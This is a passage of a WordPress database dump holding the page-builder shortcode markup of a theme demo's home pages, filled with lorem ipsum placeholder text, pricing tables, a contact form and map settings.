css=\".vc_custom_1409773905297{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384e0c0-8ae0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384e0c0-8ae0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6e0c0-8ae0\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home2','','publish','open','open','','home2','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=691',0,'page','',0),(1919,1,'2014-07-15 12:08:06','2014-07-15 12:08:06','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][layerslider_vc id=\"1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483381202{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709712876{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709718986{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709728346{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506046218{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773905297{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384e0c0-8ae0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384e0c0-8ae0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6e0c0-8ae0\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" 